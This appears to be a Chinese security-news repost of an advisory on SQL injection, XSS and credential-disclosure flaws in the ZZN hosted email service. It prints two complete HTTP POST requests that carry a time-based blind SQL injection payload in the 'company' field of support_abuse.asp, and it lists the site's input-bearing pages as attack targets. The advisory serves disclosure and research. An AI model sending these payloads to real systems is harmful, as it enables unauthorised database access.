Welcome 微信登录
编程资源 图片资源库 蚂蚁家优选 PDF转换器

首页 / 操作系统 / Linux / ZZN SQL注入/XSS/凭证泄露漏洞

发布日期:2013-08-09
更新日期:2013-08-11受影响系统:
zzn zzn
描述:
--------------------------------------------------------------------------------
CVE(CAN) ID: CVE-2007-0177ZZN是虚拟主机电子邮件服务。ZZN在实现上存在多个XSS、远程盲SQL注入、凭证泄露漏洞,这些漏洞可导致远程攻击者执行未授权数据库操作等。<*来源:Juan Carlos García
 
  链接:http://packetstormsecurity.com/files/122763/ZZN-SQL-Injection-XSS-Credential-Disclosure.html
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!1-URL encoded POST input company was set to X"; WAIT FOR DELAY "0:0:4" --POST /membersarea_en/support_abuse.asp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn=3540124170.20480.0000; ASPSESSIONIDCACSTCRR=LOBIKGEDEGMDAPNNMPGPGHHE; ASPSESSIONIDACCSTCRR=GPBIKGEDMBJEMAJEEMDILMMC
Host: www.zzn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*beenThere=yeah&company=X%27%3b%20waitfor%20delay%20%270%3a0%3a2%27%20--%20&Complaint=secnight&Email=sample@email.tst&FirstName=secnight&inout=fromzzn&LastName=secnight&Phone=555-666-0606&RetURL=http%3a%2f%2fwww.zzn.com%2fmembersarea_en&SpamCopy=&SpamEmail=sample@email.tst&VirtIP= 2-URL encoded POST input company was set to X"; WAIT FOR DELAY "0:0:4" --POST /membersarea_en/support_abuse.asp HTTP/1.1
Content-Length: 280
Content-Type: application/x-www-form-urlencoded
Cookie: BIGipServerp-vzzn=3540124170.20480.0000; ASPSESSIONIDCACSTCRR=LOBIKGEDEGMDAPNNMPGPGHHE; ASPSESSIONIDACCSTCRR=GPBIKGEDMBJEMAJEEMDILMMC
Host: www.zzn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)
Accept: */*beenThere=yeah&company=X%27%3b%20waitfor%20delay%20%270%3a0%3a2%27%20--%20&Complaint=secnight&Email=sample@email.tst&FirstName=secnight&inout=fromzzn&LastName=secnight&Phone=555-666-0606&RetURL=http%3a%2f%2fwww.zzn.com%2fmembersarea_en&SpamCopy=&SpamEmail=sample@email.tst&VirtIP=Proof Of Concept
----------------These files have at least one input (GET or POST).
/membersarea_en/home.asp - 3 inputs/membersarea_en/joinframes.asp - 2 inputs/membersarea_en/emailaccount.asp - 4 inputs/membersarea_en/preminder.asp - 1 inputs/membersarea_en/signup.asp - 2 inputs/membersarea_en/support.asp - 1 inputs/membersarea_en/insidelogin.asp - 2 inputs/membersarea_en/directemailerror.asp - 1 inputs/membersarea_en/alertwindow.asp - 1 inputs/membersarea_en/loginerror.asp - 1 inputs/membersarea_en/support_abuse.asp - 1 inputs/membersarea_en/copy%20of%20emailaccount.asp - 1 inputs/membersarea_en/directregister.asp - 1 inputs/zlog - 1 inputs/zlog/blog_error.asp - 1 inputs建议:
--------------------------------------------------------------------------------
厂商补丁:zzn
---
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.zzn.comNetworkMiner 目录遍历和不安全库加载漏洞Joomla! redSHOP组件“pid” SQL注入漏洞相关资讯      ZZN安全漏洞  本文评论 查看全部评论 (0)
表情: 姓名: 字数


评论声明
  • 尊重网上道德,遵守中华人民共和国的各项有关法律法规
  • 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
  • 本站管理人员有权保留或删除其管辖留言中的任意内容
  • 本站有权在网站内转载或引用您的评论
  • 参与本评论即表明您已经阅读并接受上述条款
版权所有©石家庄振强科技有限公司2024 冀ICP备08103738号-5 网站地图